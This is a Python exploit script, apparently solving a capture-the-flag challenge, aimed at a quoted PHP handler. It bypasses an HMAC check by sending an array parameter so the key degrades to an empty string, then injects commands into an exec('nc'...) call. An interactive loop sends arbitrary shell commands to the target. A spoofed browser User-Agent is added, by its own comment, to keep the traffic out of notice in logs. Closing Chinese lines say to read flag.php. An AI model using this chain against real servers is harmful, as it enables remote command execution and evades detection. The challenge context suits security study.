import requests
import hmac,re
from urllib.parse import quote,unquote
# Vulnerable PHP handler from the target, kept here for reference only (it is a
# bare string expression, nothing in this script executes it).
# Two weaknesses are chained by getShell() further down:
#  1. Sending `White-cat-monitor[]=...` makes $_POST['White-cat-monitor'] an array.
#     hash_hmac() cannot hash an array, so the re-keying line
#     `$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine)`
#     does not yield a derived key, and the following hash_hmac() call on One-ear
#     runs with a NULL key, i.e. the empty string after coercion. The real secret
#     from getenv("clandestine") therefore never enters the computation.
#     (NOTE(review): this is PHP 7-era behaviour -- a warning plus NULL return;
#     PHP 8 raises a TypeError instead. Confirm the target's PHP version.)
#  2. `exec("nc".$_POST['One-ear'])` concatenates user input straight into a
#     shell command, so any One-ear value starting with ';' runs an arbitrary
#     command right after `nc`.
# The strict comparison `$hh !== $_POST['Black-Cat-Sheriff']` is satisfied by the
# client computing hmac_sha256(key="", One-ear) itself.
# The stray `S` line inside the quote is a copy artefact, not part of the PHP.
'''
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
die('谁!竟敢踩我一只耳的尾巴!');
}
$clandestine = getenv("clandestine");
S
if(isset($_POST['White-cat-monitor']))
$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
if($hh !== $_POST['Black-Cat-Sheriff']){
die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');
}
echo exec("nc".$_POST['One-ear']);
'''
# Browser-like User-Agent sent with every request, so the exploit traffic does not
# announce itself with the default `python-requests/x.y` UA in the target's logs.
headers = dict([
    ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Edg/85.0.564.44'),
])
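def _build_payload(cmd):
    """Return the POST form that passes the target's HMAC check and injects *cmd*.

    - ``One-ear`` is the value the PHP side concatenates into ``exec("nc".…)``;
      the leading ``;`` terminates the ``nc`` command so the shell runs *cmd* next.
    - ``White-cat-monitor[]`` (PHP array syntax) is the bypass: hash_hmac() on an
      array does not produce a derived key, so the server-side key degrades to
      the empty string.
    - ``Black-Cat-Sheriff`` must therefore equal HMAC-SHA256(key="", One-ear),
      which we compute locally without knowing the real ``clandestine`` secret.
    """
    one_ear = ';' + cmd  # original had `';' cmd` -- a syntax error, the '+' was lost
    signature = hmac.new(b'', one_ear.encode(), digestmod='sha256').hexdigest()
    return {
        'Black-Cat-Sheriff': signature,
        'One-ear': one_ear,
        'White-cat-monitor[]': '30',
    }


def _extract_output(text):
    """Return the exec() output from the raw response body.

    The array trick makes PHP print a warning that ends in
    ``on line <b>63</b><br />`` (63 is presumably the hash_hmac line in the
    target's source -- adjust if the page reports a different number); whatever
    follows that marker is the command output. If the marker is absent (bypass
    failed, display_errors off, different PHP version) the whole body is returned
    so the operator sees what actually came back instead of an AttributeError
    from ``None.group``.
    """
    match = re.search(r'<b>63</b><br />\s*(.*)', text, re.S)
    return match.group(1) if match else text


def getShell(cmd, url='你猜猜地址'):
    """Run *cmd* on the target through the HMAC bypass + command injection and print the output.

    Args:
        cmd: shell command to execute on the target.
        url: the vulnerable endpoint; the placeholder default must be replaced
            with the real address before use.
    """
    # Original called requests.post(url, payload, headers): the third positional
    # argument of requests.post is `json`, so the headers were never sent.
    response = requests.post(url, data=_build_payload(cmd), headers=headers, timeout=10)
    print(_extract_output(response.text))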
if __name__ == "__main__":
    # Interactive pseudo-shell: keep reading a command at the `> ` prompt and
    # firing it at the target until the operator types `quit`.
    for cmd in iter(lambda: input('> '), 'quit'):
        getShell(cmd)
运行脚本后在 `> ` 提示符输入:
cat flag.php
响应中 PHP 警告之后的部分就是 flag。